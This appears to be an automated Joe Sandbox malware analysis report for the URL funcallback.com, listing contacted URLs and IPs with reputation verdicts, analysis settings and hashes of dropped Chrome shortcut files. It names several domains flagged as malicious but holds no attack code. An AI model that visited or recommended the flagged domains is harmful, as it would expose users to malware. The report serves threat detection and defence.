                                                    https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dent&oit=1&cp=4&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                      high
                                                      https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/home-treatment-1.jpgfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3Adentalhealthstop&oit=3&cp=6&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                        high
                                                        https://exodontia.info/drugs-for-oral-conditions/false
                                                          unknown
                                                          http://funcallback.com/true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://exodontia.info/wp-content/plugins/wp-gdpr-compliance/Assets/css/front.css?ver=1706555011false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop&oit=3&cp=8&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                            high
                                                            https://exodontia.info/wp-content/plugins/loading-page/css/loading-page.css?ver=free-1.1.10false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://exodontia.info/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A&oit=4&cp=6&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                              high
                                                              https://cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.jsfalse
                                                                high
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://dentalhealthstop.co.uk/private-dental-treatments/operculectomy/chromecache_170.1.dr, chromecache_146.1.drfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://exodontia.info/wp-json/chromecache_154.1.dr, chromecache_209.1.dr, chromecache_156.1.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://exodontia.info/aneurysmal-bone-cyst/chromecache_156.1.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://dentalhealthstop.co.uk/private-dental-treatments/chromecache_170.1.dr, chromecache_146.1.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/happy.jpgchromecache_168.1.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://exodontia.info/oral-sub-mucous-fibrosis/chromecache_156.1.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://ampcid.google.com/v1/publisher:getClientIdchromecache_231.1.dr, chromecache_138.1.drfalse
                                                                  high
                                                                  https://exodontia.info/wp-content/themes/themify-shoppe/themify/themify-builder/css/modules/bg-zoom.chromecache_154.1.dr, chromecache_209.1.dr, chromecache_156.1.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://dentalhealthstop.co.uk/nhs-dental-treatments/dentures/chromecache_170.1.dr, chromecache_146.1.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://github.com/twbs/bootstrap/graphs/contributors)chromecache_193.1.drfalse
                                                                    high
                                                                    https://exodontia.info/membership-links/chromecache_156.1.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://exodontia.info/alveoplasty/chromecache_156.1.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://patient.info/medicine/flurbiprofen-lozenges-strefenchromecache_154.1.drfalse
                                                                      high
                                                                      https://use.typekit.net/af/40b843/00000000000000007735b315/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                        high
                                                                        https://use.typekit.net/af/4560d4/00000000000000007735b316/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                          high
                                                                          https://exodontia.info/actinic-cheilitis/chromecache_156.1.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://exodontia.info/dentigerous-cyst/chromecache_156.1.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://use.typekit.net/af/4e4383/00000000000000007735b338/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                            high
                                                                            https://dentalhealthstop.co.uk/nhs-dental-treatments/chromecache_170.1.dr, chromecache_146.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://exodontia.info/median-rhomboid-glossitis/chromecache_156.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://dentalhealthstop.co.uk/website-privacy-policychromecache_170.1.dr, chromecache_146.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://exodontia.info/xmlrpc.php?rsdchromecache_154.1.dr, chromecache_209.1.dr, chromecache_156.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://p.typekit.net/p.css?s=1&k=aqv2rmz&ht=tk&f=28423.28431.28434.28435.28437.28439.28442.28443.28chromecache_165.1.drfalse
                                                                              high
                                                                              https://exodontia.info/jaw-dislocation/chromecache_156.1.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://use.typekit.net/af/4560d4/00000000000000007735b316/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                high
                                                                                https://use.typekit.net/af/a8cb3e/00000000000000007735b314/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                  high
                                                                                  https://exodontia.info/desquamative-gingivitis/chromecache_156.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://use.typekit.net/af/456e23/00000000000000007735b335/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                    high
                                                                                    https://use.typekit.net/af/766611/00000000000000007735b329/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                      high
                                                                                      https://use.typekit.net/af/82d493/00000000000000007735b30b/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                        high
                                                                                        https://schema.org/WPHeaderchromecache_154.1.dr, chromecache_209.1.dr, chromecache_156.1.drfalse
                                                                                          high
                                                                                          https://use.typekit.net/af/577aa0/00000000000000007735b32c/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                            high
                                                                                            https://use.typekit.net/af/e35fa0/00000000000000007735b327/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                              high
                                                                                              https://exodontia.info/feed/chromecache_154.1.dr, chromecache_209.1.dr, chromecache_156.1.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://use.typekit.net/af/de6f21/00000000000000007735b339/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                                high
                                                                                                https://use.typekit.net/af/440b4a/00000000000000007735b31f/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                                  high
                                                                                                  https://exodontia.info/dry-mouth-xerostomia/chromecache_156.1.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://exodontia.info/clicking-tmj-exercises/chromecache_156.1.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://exodontia.info/zinc-deficiency/chromecache_156.1.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://typekit.com/eulas/00000000000000007735b31achromecache_165.1.drfalse
                                                                                                    high
                                                                                                    https://exodontia.info/atypical-odontalgia/chromecache_156.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://use.typekit.net/af/b3ba7a/00000000000000007735b311/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                                      high
                                                                                                      https://exodontia.info/candidal-leukoplakia/chromecache_156.1.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://use.typekit.net/af/a468a4/00000000000000007735b31d/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                                        high
                                                                                                        https://exodontia.info/wp-content/themes/themify-shoppe/themify/themify-builder/css/modules/frames.cchromecache_154.1.dr, chromecache_209.1.dr, chromecache_156.1.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://themify.me/docs/shoppe-documentationchromecache_198.1.dr, chromecache_172.1.dr, chromecache_187.1.drfalse
                                                                                                          high
                                                                                                          http://typekit.com/eulas/00000000000000007735b31fchromecache_165.1.drfalse
                                                                                                            high
                                                                                                            http://typekit.com/eulas/00000000000000007735b31dchromecache_165.1.drfalse
                                                                                                              high
                                                                                                              https://exodontia.info/minor-salivary-gland-biopsy-for-sjogrens-syndrome-diagnosis/chromecache_156.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://typekit.com/eulas/00000000000000007735b321chromecache_165.1.drfalse
                                                                                                                high
                                                                                                                https://exodontia.info/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fexodontia.info%2Fadverts-sponsors-chromecache_156.1.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://dentalhealthstop.co.uk/private-dental-treatments/wisdom-teeth-removal/chromecache_170.1.dr, chromecache_146.1.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://typekit.com/eulas/00000000000000007735b328chromecache_165.1.drfalse
                                                                                                                  high
                                                                                                                  https://exodontia.info/wp-content/uploads/2021/06/Medical_Management_of_BMS.pngchromecache_154.1.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://typekit.com/eulas/00000000000000007735b329chromecache_165.1.drfalse
                                                                                                                    high
                                                                                                                    https://use.typekit.net/af/bac94d/00000000000000007735b337/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_165.1.drfalse
                                                                                                                      high
                                                                                                                      http://typekit.com/eulas/00000000000000007735b327chromecache_165.1.drfalse
                                                                                                                        high
                                                                                                                        https://exodontia.info/platelet-disorders-deficiencies/chromecache_156.1.drfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://typekit.com/eulas/00000000000000007735b324chromecache_165.1.drfalse
                                                                                                                          high
                                                                                                                          http://typekit.com/eulas/00000000000000007735b32cchromecache_165.1.drfalse
                                                                                                                            high
                                                                                                                            https://exodontia.info/oral-cancer-oral-screening/chromecache_156.1.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://autoprefixer.github.iochromecache_154.1.dr, chromecache_209.1.dr, chromecache_156.1.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://typekit.com/eulas/00000000000000007735b32fchromecache_165.1.drfalse
                                                                                                                              high
                                                                                                                              https://exodontia.info/closure-of-mouth-sinus-holes/chromecache_156.1.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://typekit.com/eulas/00000000000000007735b32dchromecache_165.1.drfalse
                                                                                                                                high
                                                                                                                                https://exodontia.info/mouth-sinus-holes-oro-antral-communications/chromecache_156.1.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://typekit.com/eulas/00000000000000007735b333chromecache_165.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://exodontia.info/operculectomy/chromecache_156.1.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://typekit.com/eulas/00000000000000007735b331chromecache_165.1.drfalse
                                                                                                                                    high
                                                                                                                                    http://typekit.com/eulas/00000000000000007735b332chromecache_165.1.drfalse
                                                                                                                                      high
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      198.35.26.112
                                                                                                                                      upload.wikimedia.orgUnited States
                                                                                                                                      14907WIKIMEDIAUSfalse
                                                                                                                                      153.92.6.142
                                                                                                                                      exodontia.infoGermany
                                                                                                                                      47583AS-HOSTINGERLTfalse
                                                                                                                                      46.17.248.12
                                                                                                                                      cdnreport.netRussian Federation
                                                                                                                                      201260ARIESUAfalse
                                                                                                                                      142.250.141.106
                                                                                                                                      www.google.comUnited States
                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                      185.158.251.240
                                                                                                                                      stake.libertariancounterpoint.comNetherlands
                                                                                                                                      39378SERVINGADEtrue
                                                                                                                                      91.238.164.176
                                                                                                                                      dentalhealthstop.co.ukUnited Kingdom
                                                                                                                                      12703PULSANT-ASGBfalse
                                                                                                                                      142.250.101.103
                                                                                                                                      unknownUnited States
                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                      31.41.44.109
                                                                                                                                      debasesingle.lifeRussian Federation
                                                                                                                                      56577ASRELINKRUtrue
                                                                                                                                      104.18.11.207
                                                                                                                                      maxcdn.bootstrapcdn.comUnited States
                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                      151.101.2.137
                                                                                                                                      code.jquery.comUnited States
                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                      239.255.255.250
                                                                                                                                      unknownReserved
                                                                                                                                      unknownunknownfalse
                                                                                                                                      104.17.25.14
                                                                                                                                      cdnjs.cloudflare.comUnited States
                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                      IP
                                                                                                                                      192.168.2.16
                                                                                                                                      192.168.2.4
                                                                                                                                      192.168.2.22
                                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                      Analysis ID:1430945
                                                                                                                                      Start date and time:2024-04-24 12:11:56 +02:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 3m 50s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                      Sample URL:https://funcallback.com
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:14
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal72.win@21/187@44/15
                                                                                                                                      EGA Information:Failed
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                      • Number of executed functions: 0
                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 74.125.137.94, 142.251.2.100, 142.251.2.101, 142.251.2.138, 142.251.2.139, 142.251.2.113, 142.251.2.102, 142.251.2.84, 34.104.35.123, 142.251.2.94, 142.251.2.95, 172.67.142.245, 104.21.27.152, 142.251.2.97, 142.250.141.94, 74.125.137.102, 74.125.137.101, 74.125.137.100, 74.125.137.138, 74.125.137.139, 74.125.137.113, 23.1.236.18, 23.1.236.16, 142.250.141.95, 23.1.236.35
                                                                                                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, fonts.gstatic.com, clientservices.googleapis.com, use.fontawesome.com.cdn.cloudflare.net, a1874.dscg1.akamai.net, fe3cr.delivery.mp.microsoft.com, p.typekit.net-stls-v3.edgesuite.net, clients2.google.com, edgedl.me.gvt1.com, use-stls.adobe.com.edgesuite.net, www.googletagmanager.com, update.googleapis.com, clients.l.google.com, a1988.dscg1.akamai.net, www.google-analytics.com
                                                                                                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      No simulations
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 24 09:12:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2673
                                                                                                                                      Entropy (8bit):3.9920971522444035
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:82vdFTNROHoidAKZdA1FehwiZUklqehTy+3:8GHVoy
                                                                                                                                      MD5:A012FCD991133735F7C980B15C149176
                                                                                                                                      SHA1:B0E05ACB142B0B0BC02F6B3CAABD293B4EBD5BEB
                                                                                                                                      SHA-256:C538A2A102824CAF267903739AA3490652D6E6C77B6E3909A1F845F62EC0DA2F
                                                                                                                                      SHA-512:B74FA5995F4B6468C3A51351DD39BB3075DDF870071C42646A9AED3B22019CF5DE16622E126F5BA0E623F1FA239EF3CA52B9E6F75F2308D246DB13074115AF0A
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:L..................F.@.. ...$+.,....'.../...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.Q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.Q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.Q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.Q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.Q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........S|GI.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 24 09:12:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2675
                                                                                                                                      Entropy (8bit):4.004817362556785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8sodFTNROHoidAKZdA1seh/iZUkAQkqehYy+2:8s2HL9Q1y
                                                                                                                                      MD5:908910EDBDFAD8F435FB7200A81A69F3
                                                                                                                                      SHA1:4F95FBFD7CD0964994D48CB303F778790A1B1DF4
                                                                                                                                      SHA-256:D77479F55727F7FD956E10A75F52736AE0DB743BDD1A5DE24363337D1355BD8D
                                                                                                                                      SHA-512:3F3F5FA82F95A892F3D9BD3995B182D993D07A1558B8FBBCE29A88A9E4197BE7A2411861E505383610EE428FDDE1D2D50529B130C70AB1F2568EB5D65B3E4492
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:L..................F.@.. ...$+.,......./...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.Q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.Q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.Q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.Q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.Q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........S|GI.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2689
                                                                                                                                      Entropy (8bit):4.010923178766249
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:80dFTNRAHoidAKZdA14meh7sFiZUkmgqeh7sSy+BX:8KHtnsy
                                                                                                                                      MD5:2569AA36B2CB1D60EC8877FFA53771BF
                                                                                                                                      SHA1:B16A1FD79580E1E9BEF3E1B5168F129361154FE5
                                                                                                                                      SHA-256:69E3556B28B7A59B5EAE3AE32C3DF05854E773C56517F4C3FDF27FC0EE39CE80
                                                                                                                                      SHA-512:41408E0C1C10106D6F908C9A47820FFC92A322FD11E0F3F15548A676E12E30143B5851FB4607F94F460A8E88185F80B90D30D715E50BACAD5DE44DCB7BDE6B5C
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.Q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.Q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.Q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.Q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........S|GI.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 24 09:12:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2677
                                                                                                                                      Entropy (8bit):4.002366390576703
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8EdFTNROHoidAKZdA1TehDiZUkwqeh0y+R:86HYay
                                                                                                                                      MD5:5C2C8CBE183094686A04AA3AD6A2C012
                                                                                                                                      SHA1:504C5CDE383192126E37E81872018E3A6F923709
                                                                                                                                      SHA-256:C14D00404D9594E36563E8A846E753636ED157BA579B8443110C745BD4C34044
                                                                                                                                      SHA-512:CD58D600F28CEFE4C780E14C753D86EDFF5BF0F61FB10CADB8CDA604029E120BBD008D37C1192FE0914019454F62A8467BCD345406EE7E88CADFA4755126DB57
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:L..................F.@.. ...$+.,....j.../...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.Q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.Q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.Q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.Q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.Q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........S|GI.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 24 09:12:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2677
                                                                                                                                      Entropy (8bit):3.9943887065776544
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8LdFTNROHoidAKZdA1dehBiZUk1W1qehGy+C:8bHo9my
                                                                                                                                      MD5:C8E559C4101079067411F21C8E8742D1
                                                                                                                                      SHA1:D319EF185BFDAAA6C3A4D12FA1F6887426A8E3FB
                                                                                                                                      SHA-256:CB21AE948C91955404A6C008BDCC5220B2E6AC6FA3327E462B3DCAC9248C9AF5
                                                                                                                                      SHA-512:BECD0BF085EB4B8E8FA66AB7A73BDB4840C08105D5B34CE9FA5DDADED4824DFA20E30599CD5DCAEFF42E31CB734C593970AC821E902613914E6A032D9FE8EE45
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:L..................F.@.. ...$+.,......./...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.Q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.Q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.Q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.Q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.Q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........S|GI.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
